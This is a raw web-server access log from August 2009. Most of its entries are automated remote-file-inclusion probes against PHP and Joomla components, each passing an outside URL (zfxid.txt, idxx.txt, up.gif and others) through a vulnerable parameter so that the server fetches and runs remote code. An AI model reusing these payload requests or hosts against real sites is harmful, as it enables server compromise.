116.122.158.207 - - [15/Aug/2009:19:01:52 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:01:52 -0500] "GET /logs/access_log.1231113600///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:01:52 -0500] "GET /logs/access_log.1236038400///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:01:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
66.249.71.118 - - [15/Aug/2009:19:03:29 -0500] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.71.118 - - [15/Aug/2009:19:03:30 -0500] "GET /silver_spanish_piece_of_eight.htm HTTP/1.1" 200 2427 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
116.122.158.207 - - [15/Aug/2009:19:03:52 -0500] "GET /logs/access_log.1236038400///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:03:52 -0500] "GET /logs/access_log.1231113600///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:03:52 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:03:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201282 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:04:03 -0500] "GET /logs/access_log.1236211200///?_SERVER[DOCUMENT_ROOT]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:19:06:00 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:19:06:00 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:19:06:00 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
189.90.142.117 - - [15/Aug/2009:19:07:02 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://joaoejoao.webs.com/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:19:13:22 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:19:13:22 -0500] "GET /logs/access_log.1239321600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:19:13:22 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.187.200.218 - - [15/Aug/2009:19:13:27 -0500] "GET /logs/access_log.1243641600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zetan.fileave.com/zx.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.207.24 - - [15/Aug/2009:19:21:28 -0500] "GET /logs/access_log.1165017600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.202.2.220 - - [15/Aug/2009:19:34:56 -0500] "GET /logs/access_log.1247356800%22%20target=%22_blank//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:34:56 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:34:57 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
65.55.106.233 - - [15/Aug/2009:19:34:57 -0500] "GET /logs/access_log.1122163200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.202.2.220 - - [15/Aug/2009:19:34:58 -0500] "GET /logs/access_log.1243641600%22%20target=%22_blank//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 370 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:40:21 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:40:21 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:40:21 -0500] "GET /logs/access_log.1245456000%22%20target=%22_blank//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 367 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.202.2.220 - - [15/Aug/2009:19:41:37 -0500] "GET /logs/access_log.1245110400%22%20target=%22_blank//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.paauctions.net/cache/up.gif?? HTTP/1.1" 404 367 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
218.27.203.107 - - [15/Aug/2009:19:42:56 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:19:42:56 -0500] "GET /logs/access_log.1248134400//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.27.203.107 - - [15/Aug/2009:19:42:56 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:43:38 -0500] "GET /phphtml.php?htmlclass_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:43:38 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:43:38 -0500] "GET /logs/access_log.1245196800/phphtml.php?htmlclass_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.11.117.195 - - [15/Aug/2009:19:48:43 -0500] "GET /logs/access_log.1241049600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.826"
66.11.117.195 - - [15/Aug/2009:19:48:44 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.826"
66.11.117.195 - - [15/Aug/2009:19:48:44 -0500] "GET /logs/access_log.1241049600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.826"
66.11.117.195 - - [15/Aug/2009:19:48:44 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
66.11.117.195 - - [15/Aug/2009:19:48:44 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.826"
66.11.117.195 - - [15/Aug/2009:19:48:44 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.getnaughtygirls.com/member/content/upload/savannah/sav1/thumbs/idd.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
116.122.158.207 - - [15/Aug/2009:19:49:01 -0500] "GET /logs/access_log.1246579200/phphtml.php?htmlclass_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:19:49:10 -0500] "GET /logs/access_log.1243987200//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:19:49:10 -0500] "GET //citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:19:49:10 -0500] "GET /logs//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:19:49:10 -0500] "GET /logs/access_log.1245715200//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:49:17 -0500] "GET /logs/access_log.1244246400/phphtml.php?htmlclass_path=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:19:50:10 -0500] "GET //citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:19:50:10 -0500] "GET /logs/access_log.1243987200//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:19:50:10 -0500] "GET /logs//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:19:50:10 -0500] "GET /logs/access_log.1245715200//citywriter/head.php?path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.100.189.232 - - [15/Aug/2009:19:52:41 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kimsungjin.co.kr/bbs/images/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
61.100.189.232 - - [15/Aug/2009:19:52:41 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kimsungjin.co.kr/bbs/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.100.189.232 - - [15/Aug/2009:19:52:41 -0500] "GET /logs/access_log.1236211200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kimsungjin.co.kr/bbs/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.100.189.232 - - [15/Aug/2009:19:53:40 -0500] "GET /logs/access_log.1237507200//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kimsungjin.co.kr/bbs/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.100.189.232 - - [15/Aug/2009:19:54:44 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kimsungjin.co.kr/bbs/images/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:46 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:46 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:47 -0500] "GET /logs/access_log.1245110400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:52 -0500] "GET /logs/access_log.1245110400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:52 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:57:52 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:58:07 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:58:07 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:58:08 -0500] "GET /logs/access_log.1245110400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
64.202.120.88 - - [15/Aug/2009:19:58:22 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.811"
64.202.120.88 - - [15/Aug/2009:19:58:22 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
116.122.158.207 - - [15/Aug/2009:19:59:17 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:59:17 -0500] "GET /logs/access_log.1236038400/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:59:17 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:19:59:27 -0500] "GET /logs/access_log.1237075200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.55.208.123 - - [15/Aug/2009:20:00:05 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.122.158.207 - - [15/Aug/2009:20:03:06 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:03:08 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:03:12 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.122.158.207 - - [15/Aug/2009:20:03:39 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
193.34.16.183 - - [15/Aug/2009:20:06:52 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
193.34.16.183 - - [15/Aug/2009:20:06:52 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
193.34.16.183 - - [15/Aug/2009:20:07:06 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
193.34.16.183 - - [15/Aug/2009:20:07:14 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
81.80.122.44 - - [15/Aug/2009:20:08:19 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.medisite.fr/id??? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
81.80.122.44 - - [15/Aug/2009:20:08:19 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.medisite.fr/id??? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
91.194.250.221 - - [15/Aug/2009:20:10:14 -0500] "GET //include/write.php?dir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.194.250.221 - - [15/Aug/2009:20:10:14 -0500] "GET /logs//include/write.php?dir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 306 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.194.250.221 - - [15/Aug/2009:20:10:14 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
91.194.250.221 - - [15/Aug/2009:20:10:47 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 328 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
212.114.13.126 - - [15/Aug/2009:20:10:53 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://post193.us/chid.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:10:53 -0500] "GET /logs/access_log.1237507200//skins/advanced/advanced1.php?pluginpath[0]=http://post193.us/chid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:10:53 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://post193.us/chid.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.114.13.126 - - [15/Aug/2009:20:10:53 -0500] "GET /logs/access_log.1236988800//skins/advanced/advanced1.php?pluginpath[0]=http://post193.us/chid.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.205.67.241 - - [15/Aug/2009:20:11:17 -0500] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.medisite.fr/id??? HTTP/1.1" 404 353 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.205.67.241 - - [15/Aug/2009:20:11:17 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.medisite.fr/id??? HTTP/1.1" 404 348 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
216.17.109.216 - - [15/Aug/2009:20:11:20 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:11:20 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:11:20 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:22 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:22 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:22 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:37 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:37 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:11:37 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:11:41 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:11:41 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.245.213.226 - - [15/Aug/2009:20:11:41 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:11:54 -0500] "GET /components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:11:54 -0500] "GET /logs/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:11:54 -0500] "GET /logs/access_log.1238457600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
207.210.126.218 - - [15/Aug/2009:20:12:01 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.17.109.216 - - [15/Aug/2009:20:12:18 -0500] "GET /logs/access_log.1242777600/components/com_google_maps/google_maps.php?mosConfig_absolute_path=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:20:12:36 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:20:12:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.163.145.207 - - [15/Aug/2009:20:12:37 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.702com.net/images/baner.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0"
